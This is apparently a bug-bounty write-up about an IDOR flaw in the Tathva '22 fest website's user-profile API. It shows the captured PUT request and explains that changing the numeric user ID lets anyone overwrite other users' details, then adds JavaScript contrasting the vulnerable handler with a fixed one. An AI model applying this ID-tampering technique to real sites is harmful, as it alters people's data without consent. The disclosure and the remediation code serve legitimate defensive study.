Hacked Tathva ’22 Biggest Techno-Management Fest in South India

Cyber Security

Hello, Infosec mates ッ✋✋,

In this write-up, I’m sharing a short story about how I hacked Tathva → the biggest Techno-Management Fest in South India.

(Techno-management fest of NIT Calicut)

  • It has found itself a place in every engineering student’s calendar, and it is one of the largest platforms in South India for technical ingenuity and managerial prowess.

About the Bug

  • Before I jump into the topic, let me give you a short introduction to IDOR. There are plenty of blogs and tutorials available on this subject already; still, I’ll provide a concise note on it.

Insecure direct object references (IDOR)

  • It’s a type of access control (or authorization) vulnerability.
  • Access control: specifies whether a user is permitted to perform the action they are attempting.
  • IDOR: occurs when an application uses user-supplied input to access objects directly. If user-controlled parameter values are used directly to reach resources or functions, the application can be exploited.

For more:

https://portswigger.net/web-security/access-control

https://portswigger.net/web-security/access-control/idor

IDOR in Tathva ’22

My friend Ranjul Arumadi pointed out this event and encouraged me to take part in the online Capture the Flag competition. After registering, I confirmed that I was able to edit my details at:

https://www.tathva.org/register?editprofile=true

Being curious about security, I intercepted the request while editing the profile and saw some juicy stuff.

First request

OPTIONS /api/users/15862 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: authorization,content-type
Referer: https://www.tathva.org/
Origin: https://www.tathva.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: close

Second request

PUT /api/users/15871 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization:
Content-Length: 300
Origin: https://www.tathva.org
Referer: https://www.tathva.org/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: close

{"id":15871,
"name":" ",
"gender":"male",
"college":" ",
"branch":" ",
"year":" ",
"state":" ",
"district":" ",
"phone":" "}

Vulnerability confirmation

You can see “/api/users/<ID>” in the request line at the top of the request.

This 5-digit <ID> value can be altered manually, so an attacker can modify the details of other users without their knowledge.

Example:

Suppose the attacker’s ID number is 15860.
They can change this value to any other five-digit value, and the details of the corresponding user will be changed without that user’s knowledge.
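As an added example (not Tathva’s own code, which this write-up never shows), here is a minimal model of the PUT /api/users/<id> handler in its vulnerable form beside a fixed version that binds the target record to the authenticated identity; the in-memory store, field list and log-entry shape are assumptions:

```javascript
// Added example, not Tathva's code: a minimal model of the PUT /api/users/<id>
// handler from the write-up, vulnerable form and fixed form side by side.
// Record ids, the field list and the log-entry shape are constructed assumptions.
const users = new Map([
  [15860, { name: "attacker", phone: "000" }], // constructed sample records
  [15871, { name: "victim", phone: "111" }],
]);

// Fields a user may change on their own profile (mirrors the JSON body above).
// "id" is deliberately absent: the body must never choose which record is written.
const EDITABLE = ["name", "gender", "college", "branch", "year", "state", "district", "phone"];

function applyUpdate(id, body) {
  const row = users.get(id);
  if (!row) return { status: 404 };
  for (const key of EDITABLE) if (key in body) row[key] = body[key];
  return { status: 200, user: row };
}

// Vulnerable: the record is selected purely by the client-controlled path id,
// so any authenticated caller can overwrite any profile (the IDOR above).
function putUserVulnerable(req) {
  return applyUpdate(req.pathId, req.body);
}

// Fixed: the target record is the identity bound to the bearer token (req.auth.sub);
// a path id that does not match the caller is rejected before any write happens.
function putUserFixed(req) {
  if (!req.auth || typeof req.auth.sub !== "number") return { status: 401 };
  if (req.pathId !== req.auth.sub) return { status: 403 };
  return applyUpdate(req.auth.sub, req.body);
}

// Log-review helper: flags a PUT whose path id differs from the authenticated
// subject, which is exactly the access pattern of the IDOR described above.
function isIdorAttempt(entry) {
  return entry.method === "PUT" && entry.pathId !== entry.authSub;
}
```

The same check applies to any other object-level route (GET, DELETE) that takes a user id from the client; the comparison against the token’s subject is what stops the attack, not a secret or unpredictable id.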

Impact

  • Integrity: High

Integrity: the ability to ensure that a system and its data have not suffered unauthorized modification. Integrity protection covers not only data but also operating systems, applications and hardware, preventing alteration by unauthorized individuals.
